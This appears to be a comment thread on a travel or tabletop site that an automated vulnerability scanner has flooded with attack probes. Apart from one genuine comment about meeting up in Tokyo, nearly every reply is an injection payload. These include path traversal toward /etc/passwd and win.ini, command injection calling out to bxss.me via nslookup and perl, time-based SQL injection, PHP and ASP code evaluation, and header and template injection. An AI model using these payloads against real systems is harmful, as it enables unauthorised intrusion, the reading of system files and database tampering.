/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
/etc/passwd
re: Just_Ingest
%2fetc%2fpasswd
re: Just_Ingest
echo ynfnyq$()\ mqjlcx\nz^xyu||a #' &echo ynfnyq$()\ mqjlcx\nz^xyu||a #|" &echo ynfnyq$()\ mqjlcx\nz^xyu||a #
re: Just_Ingest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Just_Ingest
&echo qjpuqz$()\ jafqhw\nz^xyu||a #' &echo qjpuqz$()\ jafqhw\nz^xyu||a #|" &echo qjpuqz$()\ jafqhw\nz^xyu||a #
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Just_Ingest
|echo huvmqd$()\ enyfvu\nz^xyu||a #' |echo huvmqd$()\ enyfvu\nz^xyu||a #|" |echo huvmqd$()\ enyfvu\nz^xyu||a #
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Just_Ingest
'.gethostbyname(lc('hitkf'.'mkliswfb5a3d9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(90).chr(110).chr(70).'
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Just_Ingest
(nslookup hitpnwflzkqee6bdc8.bxss.me||perl -e "gethostbyname('hitpnwflzkqee6bdc8.bxss.me')")
re: Just_Ingest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Just_Ingest
".gethostbyname(lc("hituc"."jshyspsh68504.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(73).chr(116).chr(70)."
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Just_Ingest
$(nslookup hitobauptejbj6529a.bxss.me||perl -e "gethostbyname('hitobauptejbj6529a.bxss.me')")
re: Just_Ingest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
&nslookup hitgkoqvavasi0bc1b.bxss.me&'\"`0&nslookup hitgkoqvavasi0bc1b.bxss.me&`'
re: Just_Ingest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Just_Ingest
http://bxss.me/t/fit.txt%3F.jpg
re: Just_Ingest
&(nslookup hitmctzzpxrcn1af2e.bxss.me||perl -e "gethostbyname('hitmctzzpxrcn1af2e.bxss.me')")&'\"`0&(nslookup hitmctzzpxrcn1af2e.bxss.me||perl -e "gethostbyname('hitmctzzpxrcn1af2e.bxss.me')")&`'
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
/etc/shells
re: Just_Ingest
|(nslookup hitgzmwvlcwnlca6ef.bxss.me||perl -e "gethostbyname('hitgzmwvlcwnlca6ef.bxss.me')")
re: Just_Ingest
/\../\../\../\../\../\../\../etc/passwd
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
`(nslookup hiteiihnxfxsz9ee2c.bxss.me||perl -e "gethostbyname('hiteiihnxfxsz9ee2c.bxss.me')")`
re: Just_Ingest
/WEB-INF/web.xml
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(103).concat(86).concat(120).concat(67)+(require"socket"
Socket.gethostbyname("hitgv"+"fmzineuf0f201.bxss.me.")[3].to_s)+"
re: Just_Ingest
bxss.me
re: Just_Ingest
;(nslookup hitiupumwbjkjb59d8.bxss.me||perl -e "gethostbyname('hitiupumwbjkjb59d8.bxss.me')")|(nslookup hitiupumwbjkjb59d8.bxss.me||perl -e "gethostbyname('hitiupumwbjkjb59d8.bxss.me')")&(nslookup hitiupumwbjkjb59d8.bxss.me||perl -e "gethostbyname('hitiupumwbjkjb59d8.bxss.me')")
re: Just_Ingest
C:\WINDOWS\system32\drivers\etc\hosts
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(102).concat(82).concat(98).concat(68)+(require'socket'
Socket.gethostbyname('hithi'+'lvulfvjcd4baf.bxss.me.')[3].to_s)+'
re: Just_Ingest
../../../../../../../../../../windows/win.ini%00.jpg
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
/../../../../../../../../../../boot.ini
re: Just_Ingest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
..\..\..\..\..\..\..\..\windows\win.ini
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Just_Ingest
'"
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Just_Ingest
<!--
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Just_Ingest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Just_Ingest
WEB-INF/web.xml
re: Just_Ingest
WEB-INF\web.xml
Afraid we'll be missing you Justin - we'll be around Tokyo for a short stint in mid February and mid March and if you or any of the other tokyotabletrip members would like to sync up I'm sure it'd be spectacular.
re: Shi
tMARFZAn
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
-1 OR 2+521-521-1=0+0+0+1
re: Shi
-1 OR 3+521-521-1=0+0+0+1
re: Shi
if(now()=sysdate(),sleep(15),0)
re: Shi
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Shi
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Shi
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Shi
-1; waitfor delay '0:0:15' --
re: Shi
-1); waitfor delay '0:0:15' --
re: Shi
1 waitfor delay '0:0:15' --
re: Shi
CJ1n0Lac'; waitfor delay '0:0:15' --
re: Shi
-5 OR 56=(SELECT 56 FROM PG_SLEEP(15))--
re: Shi
-5) OR 666=(SELECT 666 FROM PG_SLEEP(15))--
re: Shi
-1)) OR 646=(SELECT 646 FROM PG_SLEEP(15))--
re: Shi
un0twrI8' OR 377=(SELECT 377 FROM PG_SLEEP(15))--
re: Shi
mAGR1FfG') OR 471=(SELECT 471 FROM PG_SLEEP(15))--
re: Shi
miZBxipn')) OR 120=(SELECT 120 FROM PG_SLEEP(15))--
re: Shi
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Shi
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Shi
'||(select 1 from (select pg_sleep(15))x)||'
re: Shi
''||(select 1 from (select pg_sleep(15))x)||''
re: Shi
1'"
re: Shi
@@voo5m
re: Shi
1BzhsHGmnSO
re: Shi
response.write(9735176*9176113)
re: Shi
'+response.write(9735176*9176113)+'
re: Shi
%0abcc:074625.67-22311.67.e9d9c.19990.2@bxss.me
re: Shi
"+response.write(9735176*9176113)+"
re: Shi
to@example.com>%0d%0abcc:074625.67-22312.67.e9d9c.19990.2@bxss.me
re: Shi
../../../../../../../../../../../../../../etc/passwd
re: Shi
../../../../../../../../../../../../../../windows/win.ini
re: Shi
<esi:include src="http://bxss.me/rpb.png"/>
re: Shi
file:///etc/passwd
re: Shi
../../../../../../../../../../../../../../../proc/version
re: Shi
${9999072+9999004}
re: Shi
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Shi
../../../../../../../../../../etc/passwd%00.jpg
re: Shi
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Shi
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Shi
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Shi
/etc/passwd
re: Shi
%2fetc%2fpasswd
re: Shi
echo pclmsq$()\ hnvoim\nz^xyu||a #' &echo pclmsq$()\ hnvoim\nz^xyu||a #|" &echo pclmsq$()\ hnvoim\nz^xyu||a #
re: Shi
)
re: Shi
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Shi
&echo hsavmv$()\ vezhtu\nz^xyu||a #' &echo hsavmv$()\ vezhtu\nz^xyu||a #|" &echo hsavmv$()\ vezhtu\nz^xyu||a #
re: Shi
!(()&&!|*|*|
re: Shi
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Shi
|echo hnhajc$()\ uykbae\nz^xyu||a #' |echo hnhajc$()\ uykbae\nz^xyu||a #|" |echo hnhajc$()\ uykbae\nz^xyu||a #
re: Shi
^(#$!@#$)(()))******
re: Shi
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Shi
(nslookup hitkleziwwehk35536.bxss.me||perl -e "gethostbyname('hitkleziwwehk35536.bxss.me')")
re: Shi
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Shi
$(nslookup hitdjmtcgraomeeef3.bxss.me||perl -e "gethostbyname('hitdjmtcgraomeeef3.bxss.me')")
re: Shi
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Shi
&nslookup hitqcbltwyapkdab3f.bxss.me&'\"`0&nslookup hitqcbltwyapkdab3f.bxss.me&`'
re: Shi
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Shi
&(nslookup hitpovrhlwtxhb0a31.bxss.me||perl -e "gethostbyname('hitpovrhlwtxhb0a31.bxss.me')")&'\"`0&(nslookup hitpovrhlwtxhb0a31.bxss.me||perl -e "gethostbyname('hitpovrhlwtxhb0a31.bxss.me')")&`'
re: Shi
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Shi
file:///etc/passwd
re: Shi
|(nslookup hitrjcgklfuxxfa169.bxss.me||perl -e "gethostbyname('hitrjcgklfuxxfa169.bxss.me')")
re: Shi
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Shi
'.gethostbyname(lc('hitgq'.'arnwgkdy6871c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(67).chr(99).chr(68).'
re: Shi
/\../\../\../\../\../\../\../etc/passwd
re: Shi
`(nslookup hityjxbiiaonv571e3.bxss.me||perl -e "gethostbyname('hityjxbiiaonv571e3.bxss.me')")`
re: Shi
Http://bxss.me/t/fit.txt
re: Shi
".gethostbyname(lc("hitek"."vhylsfaxa6f46.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(83).chr(98).chr(83)."
re: Shi
/WEB-INF/web.xml
re: Shi
;(nslookup hitbxheldxlbse1a16.bxss.me||perl -e "gethostbyname('hitbxheldxlbse1a16.bxss.me')")|(nslookup hitbxheldxlbse1a16.bxss.me||perl -e "gethostbyname('hitbxheldxlbse1a16.bxss.me')")&(nslookup hitbxheldxlbse1a16.bxss.me||perl -e "gethostbyname('hitbxheldxlbse1a16.bxss.me')")
re: Shi
http://bxss.me/t/fit.txt%3F.jpg
re: Shi
C:\WINDOWS\system32\drivers\etc\hosts
re: Shi
/etc/shells
re: Shi
../../../../../../../../../../windows/win.ini%00.jpg
re: Shi
c:/windows/win.ini
re: Shi
bxss.me
re: Shi
/../../../../../../../../../../boot.ini
re: Shi
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Shi
..\..\..\..\..\..\..\..\windows\win.ini
re: Shi
HttP://bxss.me/t/xss.html?%00
re: Shi
"+"A".concat(70-3).concat(22*4).concat(102).concat(87).concat(101).concat(77)+(require"socket"
Socket.gethostbyname("hitpz"+"vsjjgpsq9c13e.bxss.me.")[3].to_s)+"
re: Shi
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Shi
bxss.me/t/xss.html?%00
re: Shi
'+'A'.concat(70-3).concat(22*4).concat(105).concat(77).concat(108).concat(72)+(require'socket'
Socket.gethostbyname('hitpf'+'wzetwagp9b031.bxss.me.')[3].to_s)+'
re: Shi
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Shi
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Shi
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Shi
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Shi
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Shi
';print(md5(31337));$a='
re: Shi
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.